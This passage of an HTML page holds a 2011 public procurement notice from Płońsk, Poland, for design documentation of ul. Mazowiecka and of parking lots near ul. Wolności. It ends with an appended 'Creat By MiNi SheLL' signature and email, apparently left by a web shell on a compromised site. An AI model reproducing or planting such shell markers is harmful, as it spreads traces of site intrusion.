     1) przedłużającym się terminem uzyskania warunków branżowych,
     2) przedłużającym się terminem uzgadniania projektu budowlanego,
     3) zmianą osób wskazanych w ofercie, które będą uczestniczyć w wykonywaniu zamówienia pod warunkiem wykazania spełnienia przez te osoby uprawnień określonych w siwz.
Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności                                       w  postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plonsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy: 09-100 Płońsk, ul. Płocka 39 w Urzędzie Miejskim (wejście od ul. 1 Maja) w Kancelarii Urzędu - Referat Zamówień Publicznych, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2011 godzina 09:00, miejsce: 09-100 Płońsk, ul. Płocka 39 w Urzędzie Miejskim (wejście od ul. 1 Maja) w Kancelarii Urzędu - Sala Obsługi Interesantów (na parterze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 11.06.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dokumentacja projektowa dla części I zamówienia będzie podstawą ubiegania się o środki UE na realizację inwestycji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowych:
Część I: 
Opracowanie dokumentacji projektowej przebudowy ul. Mazowieckiej w Płońsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części I jest: Opracowanie dokumentacji projektowej przebudowy ul. Mazowieckiej w Płońsku.
Wykonawca zobowiązany jest wykonać dokumentację zgodnie z obowiązującymi przepisami prawa,  w szczególności:
-Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego  (Dz. U. z 2004 r. Nr 202, poz. 2072),
-Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu       i formy projektu budowlanego (Dz. U. z 2003 r., Nr 120, poz.1133). 
Ponadto należy uwzględnić wymagania wszystkich związanych przepisów, norm i zarządzeń, m.in.:
-Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999 r. Nr 43, poz. 430),
-Rozporządzenie Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. z 2010 r. Nr 213, poz. 1397),
-Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729),
-Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U.  z 2004 r. Nr 130, poz. 1389),
-Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126),
-Ustawa z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908 t.j.),
-Ustawa z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2007 r. Nr 19, poz. 115 t.j.),
-Ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 t.j.),
-Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 t.j.).
Zakres przedmiotu zamówienia
1.	Opracowanie kompletnej dokumentacji projektowej na całość zadania oraz  opracowań towarzyszących, w tym:
1)	wykonanie mapy do celów projektowych,
2)	uzyskanie w imieniu Zamawiającego decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia drogowego, w tym w szczególności złożenie wniosku wraz z kompletem wymaganych przepisami prawa załączników,
3)	opracowanie  dokumentacji niezbędnej do realizacji przedmiotu zamówienia, wynikającej z przepisów w zakresie udostępnienia informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, a także  z dyrektyw UE w tym w zakresie (jeżeli będzie wymagana), 
4)	opracowanie dokumentów formalno-prawnych pozwalających na uregulowanie własności gruntu przygotowane w uzgodnieniu i za akceptacją Zamawiającego (jeżeli będą wymagane),
5)	badania geotechniczne gruntu (jeżeli będą wymagane), 
6)	pozwolenie wodno prawne (jeżeli będzie wymagane),
7)	inwentaryzację zieleni, projekt gospodarki istniejącą szatą roślinną, 
8)	projekt budowlany i wykonawczy drogi,  
9)	projekt budowy  lub przebudowy odwodnienia (kanalizacji deszczowej), 
10)	projekt budowy oświetlenia drogowego, 
11)	przedmiary robót,  oddzielnie dla każdej branży,
12)	kosztorys inwestorski,
13)	szczegółowe specyfikacje techniczne wykonania i odbioru robót,
14)	informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ),
15)	uzyskanie opinii  Zespołu  Koordynacji usytuowania projektowanych sieci uzbrojenia terenu Starostwa Powiatowego w Płońsku,
16)	uzyskanie wymaganych opinii i innych uzgodnień właściwych organów  niezbędnych do uzyskania decyzji administracyjnych,
17)	projekt organizacji ruchu, 
18)	uzyskanie w imieniu Zamawiającego niezbędnych warunków technicznych dla projektowanej w pasie drogowym infrastruktury technicznej, 
19)	złożenie w imieniu Zamawiającego wniosku do Starostwa Powiatowego w Płońsku o wydanie decyzji  pozwolenia na budowę,
20)	opracowanie studium wykonalności dla inwestycji finansowanej przez Unię Europejską, (wraz              z analizą kosztów i korzyści związanych z planowaną inwestycją, oceną możliwości uzyskania dofinansowania z UE),
21)	mapy zawierające projekty podziału nieruchomości (jeżeli będą wymagane).

Dokumentacja projektowa będzie podstawą ubiegania się o środki UE na realizację inwestycji.

Zamawiający zastrzega sobie prawo do weryfikacji projektu przez niezależną jednostkę.

2.	Pełnienie nadzoru autorskiego we wszystkich branżach objętych projektowaniem, w tym udział                   w radach budowy, uzgadnianie indywidualnej dokumentacji technicznej i rysunków warsztatowych opracowywanych przez wykonawcę robót budowlanych, kwalifikowanie odstąpień od zatwierdzonego projektu budowlanego.
Parametry techniczne do uwzględnienia w dokumentacji projektowej:
Droga gminna na odcinku od ul. Płockiej do drogi nr 10 o długości - ok. 865 m. 
Klasa drogi - Lp ? w kierunku Zo ?.
Funkcje w układzie miejskim - obsługa dzielnicy przemysłowej w kierunku: powiązania wewnątrzmiejskie.
Przekrój jezdni - 1x7,0 m
Szerokość w liniach rozgraniczających - 25,0 m
Przebieg po śladzie istniejącej ulicy. 

W projekcie należy uwzględnić:
-ścieżki rowerowe,
-pasy terenu pod budowę infrastruktury technicznej,
-powiązanie projektu z Projektowaną Obwodnicą Zachodnią  im. Jana Pawła II w Płońsku (projekt w trakcie opracowania, koncepcja w załączeniu - załącznik nr 9 do siwz,
-poprawę bezpieczeństwa ruchu na skrzyżowaniach, 
-poprawę płynności i sprawności ruchu  na skrzyżowaniach,
-miejsca parkingowe, 
-poprawę jakości nawierzchni ulicy i chodników,
-odwodnienie ulicy, 
-aktualizację organizacji ruchu drogowego. 

Wykonawca jest zobowiązany uzyskać akceptację Zamawiającego w zakresie szczegółowych rozwiązań technicznych na etapie projektowania.

Zamawiający dostarczy Wykonawcy w dniu podpisania umowy wypisy i wyrysy z Miejscowego  Planu  Zagospodarowania Przestrzennego miasta Płońska. 
Dokumentację projektową należy sporządzić w formie papierowej w 8 egzemplarzach,  kosztorys inwestorski w 2 egz. 
Pełen zakres dokumentacji projektowo-kosztorysowej (oprócz kosztorysu inwestorskiego) należy również sporządzić w wersji elektronicznej na nośniku CD/DVD ( opracowania w wersji elektronicznej mają służyć Zamawiającemu do zamieszczenia dokumentacji na stronie internetowej) - w formacie pdf..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II:
Opracowanie dokumentacji projektowych:
1) Budowa parkingów na terenach parku przy ulicy Wolności po stronie północnej ulicy, na skarpie -
od ul. Grunwaldzkiej w kierunku zachodnim,
2) Budowy parkingów na terenach parku przy ul. Wolności przylegającym od strony pn. - zach. do 
zespołu garaży przy osiedlu Wspólnoty Mieszkaniowej,
3) Ciągu pieszo jezdnego od ul. Grunwaldzkiej w kierunku pn. - wsch. przylegającego do budynku
Grunwaldzka 28 i wyznaczenie pasa do parkowania pojazdów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części II jest: Opracowanie dokumentacji projektowych (oddzielnej dla każdego obiektu):
1)	Budowa parkingów na terenach parku przy ulicy Wolności po stronie północnej ulicy, na skarpie - od ul. Grunwaldzkiej w kierunku zachodnim,
2)	Budowy parkingów na terenach parku przy ul. Wolności przylegającym od strony pn.-zach. do zespołu garaży przy osiedlu Wspólnoty Mieszkaniowej,
3)	Ciągu pieszo jezdnego od ul. Grunwaldzkiej w kierunku pn.-wsch. przylegającego do budynku Grunwaldzka 28 i wyznaczenie pasa do parkowania pojazdów.

Wykonawca zobowiązany jest wykonać dokumentację zgodnie z obowiązującymi przepisami prawa,  w szczególności:
-Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego  (Dz. U. z 2004 r. Nr 202, poz. 2072),
-Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu               i formy projektu budowlanego (Dz. U. z 2003 r., Nr 120, poz.1133). 
Ponadto należy uwzględnić wymagania wszystkich związanych przepisów, norm i zarządzeń, m.in.:
-Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999 r. Nr 43, poz. 430),
-Rozporządzenie Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. z 2010 r. Nr 213, poz. 1397),
-Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r. Nr 177, poz. 1729),
-Rozporządzenie Ministra Infrastruktury z 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U.  z 2004 r. Nr 130, poz. 1389),
-Rozporządzenie Ministra Infrastruktury z 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126),
-Ustawa z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r. Nr 108, poz. 908 t.j.),
-Ustawa z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2007 r. Nr 19, poz. 115 t.j.),
-Ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 t.j.),
-Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 t.j.).


Zakres przedmiotu zamówienia
1. Opracowanie kompletnej dokumentacji projektowej na całość zamówienia oraz  opracowań towarzyszących, (oddzielnie dla każdego obiektu) w tym:

1)	wykonanie mapy do celów projektowych,
2)	uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach zgody na realizację przedmiotu umowy, w tym w szczególności złożenie wniosku wraz                        z kompletem wymaganych przepisami prawa załączników,
3)	opracowanie  dokumentacji niezbędnej do realizacji przedmiotu zamówienia, wynikającej                z przepisów w zakresie udostępnienia informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (jeżeli będzie wymagana), 
4)	opracowanie dokumentów formalno-prawnych pozwalających na uregulowanie własności gruntu przygotowane w uzgodnieniu i za akceptacją Zamawiającego (jeżeli będą wymagane),
5)	badania geotechniczne gruntu (jeżeli będą wymagane), 
6)	pozwolenie wodno prawne (jeżeli będzie wymagane),
7)	inwentaryzację zieleni, projekt gospodarki istniejącą szatą roślinną, 
8)	projekt budowlany wykonawczy,  
9)	projekt budowy  lub przebudowy odwodnienia (kanalizacji deszczowej), 
10)	projekt budowy oświetlenia drogowego, 
11)	przedmiary robót,  oddzielnie dla każdej branży w ramach obiektu,
12)	kosztorys inwestorski,
13)	szczegółowe specyfikacje techniczne wykonania i odbioru robót,
14)	informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ),
15)	uzyskanie opinii  Zespołu  Koordynacji usytuowania projektowanych sieci uzbrojenia terenu Starostwa Powiatowego w Płońsku,
16)	uzyskanie wymaganych opinii i innych uzgodnień właściwych organów  niezbędnych do uzyskania decyzji administracyjnych,
17)	projekt organizacji ruchu (jeżeli będzie wymagany),
18)	uzyskanie w imieniu Zamawiającego niezbędnych warunków technicznych dla projektowanej w pasie drogowym infrastruktury technicznej, 
19)	złożenie w imieniu Zamawiającego wniosku do Starostwa Powiatowego w Płońsku 
      o wydanie decyzji  pozwolenia na budowę,
20)	mapy zawierające projekty podziału nieruchomości (jeżeli będą wymagane).
2.	Pełnienie nadzoru autorskiego we wszystkich branżach objętych projektowaniem, w tym udział     w radach budowy, uzgadnianie indywidualnej dokumentacji technicznej i rysunków warsztatowych opracowywanych przez wykonawcę robót budowlanych, kwalifikowanie odstąpień od zatwierdzonego projektu budowlanego.

Parametry techniczne do uwzględnienia w dokumentacji projektowej:
1)	Obiekt - Budowa parkingów na terenach parku przy ulicy Wolności po stronie północnej ulicy, na skarpie - od ul. Grunwaldzkiej w kierunku zachodnim,
Parking zielony:
Powierzchnia parkingu ok. 782 m2
Miejsc parkingowych ok. 34
Nawierzchnia: kostka betonowa, płyty ażurowe lub inne rozwiązania zaproponowane przez Wykonawcę. 
(mapa z proponowanym terenem lokalizacji parkingu w załączeniu - załącznik nr 10 do siwz).

2)	Obiekt - Budowy parkingów na terenach parku przy ul. Wolności przylegającym od strony pn. - zach. do zespołu garaży przy osiedlu Wspólnoty Mieszkaniowej,
Powierzchnia parkingu ok. 276 m2
Miejsc parkingowych ok. 12
Nawierzchnia: kostka betonowa lub inne rozwiązania zaproponowane przez Wykonawcę.
W projekcie należy uwzględnić powiązanie projektu z Projektowaną Obwodnicą Wewnętrzną Centrum miasta Płońska (załącznik nr 9 do siwz).

3)	Obiekt - Ciągu pieszo jezdnego od ul. Grunwaldzkiej w kierunku pn.- wsch. przylegającego do budynku Grunwaldzka 28 i wyznaczenie pasa do parkowania pojazdów.
Długość ok. 90 m
Nawierzchnia: kostka betonowa lub inne rozwiązania zaproponowane przez Wykonawcę.

Zamawiający zastrzega sobie prawo do weryfikacji projektu przez niezależną jednostkę.

Wykonawca jest zobowiązany uzyskać akceptację Zamawiającego w zakresie szczegółowych rozwiązań technicznych na etapie projektowania (dotyczy wszystkich obiektów).

Zamawiający dostarczy Wykonawcy w dniu podpisania umowy wypisy i wyrysy z Miejscowego  Planu  Zagospodarowania Przestrzennego miasta Płońska. 
Dokumentację projektową należy sporządzić w formie papierowej w 8 egzemplarzach,  kosztorys inwestorski w 2 egz. (dla każdego obiektu oddzielnie)
Pełny zakres dokumentacji projektowo-kosztorysowej (oprócz kosztorysu inwestorskiego) należy również sporządzić w wersji elektronicznej na nośniku CD/DVD ( opracowania w wersji elektronicznej mają służyć Zamawiającemu do zamieszczenia dokumentacji na stronie internetowej) - w formacie pdf..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com